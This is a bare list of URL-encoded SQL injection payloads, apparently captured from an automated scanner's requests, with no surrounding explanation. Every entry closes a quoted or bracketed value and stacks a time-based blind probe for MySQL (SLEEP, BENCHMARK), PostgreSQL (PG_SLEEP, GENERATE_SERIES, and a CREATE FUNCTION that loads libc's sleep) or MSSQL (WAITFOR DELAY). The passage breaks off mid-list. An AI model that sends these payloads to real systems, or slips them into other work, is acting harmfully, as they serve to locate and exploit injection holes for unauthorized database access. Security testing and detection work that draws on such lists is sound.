1234.5%22%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%22AvMs%22%20LIKE%20%22AvMs 1234.5%22%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%22qRac%22%20LIKE%20%22qRac 1234.5%22%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%22hFXc%22%20LIKE%20%22hFXc 1234.5%29%20WHERE%203443%3D3443%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%27%29%20WHERE%207860%3D7860%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%27%20WHERE%207332%3D7332%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%22%20WHERE%202486%3D2486%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%27%20%7C%7C%20%28SELECT%208813%20FROM%20DUAL%20WHERE%206968%3D6968%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204039%20WHERE%207345%3D7345%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%206581%20FROM%20DUAL%20WHERE%202584%3D2584%3B%20SELECT%20SLEEP%285%29%3B%23%20%29 1234.5%20%2B%20%28SELECT%208367%20WHERE%205557%3D5557%3B%20SELECT%20SLEEP%285%29%3B%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27QHNG%27%20FROM%20DUAL%20WHERE%209073%3D9073%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Tbpe%27%20WHERE%206898%3D6898%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20SLEEP%285%29%3B%23%20%23 1234.5%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%289090%3D9090 1234.5%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%283002%3D3002 1234.5%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%286161%3D6161 1234.5%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%27kjKO%27%3D%27kjKO 1234.5%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%27pOgU%27%3D%27pOgU 1234.5%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%28%27lGIF%27%3D%27lGIF 1234.5%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%27vxgb%27%3D%27vxgb 1234.5%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%27zAdc%27%20LIKE%20%27zAdc 1234.5%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%27UKFb%27%20LIKE%20%27UKFb 1234.5%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%28%27yFGl%27%20LIKE%20%27yFGl 1234.5%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%27cibu%27%20LIKE%20%27cibu 1234.5%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%22qzRd%22%3D%22qzRd 1234.5%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%22lZLV%22%3D%22lZLV 1234.5%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%28%22mXcI%22%3D%22mXcI 1234.5%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%22ZdNE%22%3D%22ZdNE 1234.5%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%22CrXl%22%20LIKE%20%22CrXl 1234.5%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%22oyXE%22%20LIKE%20%22oyXE 1234.5%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%28%28%28%22vlvP%22%20LIKE%20%22vlvP 1234.5%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20AND%20%22JcXW%22%20LIKE%20%22JcXW 1234.5%29%20WHERE%206274%3D6274%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%27%29%20WHERE%207321%3D7321%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%27%20WHERE%209608%3D9608%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%22%20WHERE%207734%3D7734%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23 1234.5%27%20%7C%7C%20%28SELECT%202272%20FROM%20DUAL%20WHERE%205051%3D5051%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207987%20WHERE%204037%3D4037%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208341%20FROM%20DUAL%20WHERE%205573%3D5573%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20%29 1234.5%20%2B%20%28SELECT%203590%20WHERE%206237%3D6237%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27cjtX%27%20FROM%20DUAL%20WHERE%203113%3D3113%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27TFsY%27%20WHERE%203173%3D3173%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x464b5a57%29%29%3B%23%20%23 1234.5%29%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%27%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%22%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%282608%3D2608 1234.5%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%287496%3D7496 1234.5%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%284175%3D4175 1234.5%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%27IjGO%27%3D%27IjGO 1234.5%27%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%27zKEi%27%3D%27zKEi 1234.5%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%27OLqW%27%3D%27OLqW 1234.5%27%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%27tTja%27%3D%27tTja 1234.5%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%27dusq%27%20LIKE%20%27dusq 1234.5%27%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%27qhDJ%27%20LIKE%20%27qhDJ 1234.5%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%27bUaB%27%20LIKE%20%27bUaB 1234.5%27%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%27jKPi%27%20LIKE%20%27jKPi 1234.5%22%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%22OzXm%22%3D%22OzXm 1234.5%22%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%22WAWP%22%3D%22WAWP 1234.5%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%22tGZW%22%3D%22tGZW 1234.5%22%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%22pxlT%22%3D%22pxlT 1234.5%22%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%22yFaE%22%20LIKE%20%22yFaE 1234.5%22%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%22HwlZ%22%20LIKE%20%22HwlZ 1234.5%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%22fCXR%22%20LIKE%20%22fCXR 1234.5%22%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%22oWkD%22%20LIKE%20%22oWkD 1234.5%29%20WHERE%201003%3D1003%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%27%29%20WHERE%205248%3D5248%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%27%20WHERE%209700%3D9700%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%22%20WHERE%207192%3D7192%3B%20SELECT%20PG_SLEEP%285%29%3B-- 1234.5%27%20%7C%7C%20%28SELECT%208937%20FROM%20DUAL%20WHERE%205722%3D5722%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202444%20WHERE%202152%3D2152%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207080%20FROM%20DUAL%20WHERE%207375%3D7375%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29 1234.5%20%2B%20%28SELECT%201093%20WHERE%203069%3D3069%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27SaaN%27%20FROM%20DUAL%20WHERE%202275%3D2275%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27iKlj%27%20WHERE%209443%3D9443%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%23 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%287671%3D7671 1234.5%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%289405%3D9405 1234.5%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%281254%3D1254 1234.5%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%27mmto%27%3D%27mmto 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%27DHWl%27%3D%27DHWl 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%27ePQp%27%3D%27ePQp 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%27vNsm%27%3D%27vNsm 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%27verJ%27%20LIKE%20%27verJ 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%27qDEg%27%20LIKE%20%27qDEg 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%27hjEk%27%20LIKE%20%27hjEk 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%27oGvu%27%20LIKE%20%27oGvu 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%22rFuH%22%3D%22rFuH 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%22ptWR%22%3D%22ptWR 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%22ElmA%22%3D%22ElmA 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%22xtLh%22%3D%22xtLh 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%22RYAB%22%20LIKE%20%22RYAB 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%22leAt%22%20LIKE%20%22leAt 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%22XwZk%22%20LIKE%20%22XwZk 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%22Gvvz%22%20LIKE%20%22Gvvz 1234.5%29%20WHERE%202780%3D2780%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%27%29%20WHERE%208126%3D8126%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%27%20WHERE%204731%3D4731%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%22%20WHERE%209049%3D9049%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- 1234.5%27%20%7C%7C%20%28SELECT%208537%20FROM%20DUAL%20WHERE%204094%3D4094%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203270%20WHERE%203915%3D3915%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%201020%20FROM%20DUAL%20WHERE%204919%3D4919%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29 1234.5%20%2B%20%28SELECT%208296%20WHERE%205002%3D5002%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27CQwp%27%20FROM%20DUAL%20WHERE%202842%3D2842%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27DbzE%27%20WHERE%204651%3D4651%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%23 1234.5%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%283736%3D3736 1234.5%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%287144%3D7144 1234.5%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%288169%3D8169 1234.5%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%27Rboe%27%3D%27Rboe 1234.5%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%27ISur%27%3D%27ISur 1234.5%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%27bjRn%27%3D%27bjRn 1234.5%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%27KKWQ%27%3D%27KKWQ 1234.5%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%27opam%27%20LIKE%20%27opam 1234.5%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%27LGFA%27%20LIKE%20%27LGFA 1234.5%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%27oJVt%27%20LIKE%20%27oJVt 1234.5%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%27wlCU%27%20LIKE%20%27wlCU 1234.5%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%22kMaB%22%3D%22kMaB 1234.5%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%22nAyY%22%3D%22nAyY 1234.5%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%22VKFF%22%3D%22VKFF 1234.5%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%22fmeF%22%3D%22fmeF 1234.5%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%22EZnZ%22%20LIKE%20%22EZnZ 1234.5%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%22KQnM%22%20LIKE%20%22KQnM 1234.5%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%22iPLf%22%20LIKE%20%22iPLf 1234.5%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%22FUaf%22%20LIKE%20%22FUaf 1234.5%29%20WHERE%201261%3D1261%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%27%29%20WHERE%201260%3D1260%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%27%20WHERE%207210%3D7210%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%22%20WHERE%204201%3D4201%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1234.5%27%20%7C%7C%20%28SELECT%209206%20FROM%20DUAL%20WHERE%204077%3D4077%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209760%20WHERE%202806%3D2806%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208169%20FROM%20DUAL%20WHERE%205241%3D5241%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29 1234.5%20%2B%20%28SELECT%206058%20WHERE%204589%3D4589%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27hCaT%27%20FROM%20DUAL%20WHERE%201710%3D1710%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MrWP%27%20WHERE%202240%3D2240%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%23 1234.5%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%284550%3D4550 1234.5%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%287306%3D7306 1234.5%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%282936%3D2936 1234.5%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%27lMXa%27%3D%27lMXa 1234.5%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%27sOPd%27%3D%27sOPd 1234.5%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%27hwNr%27%3D%27hwNr 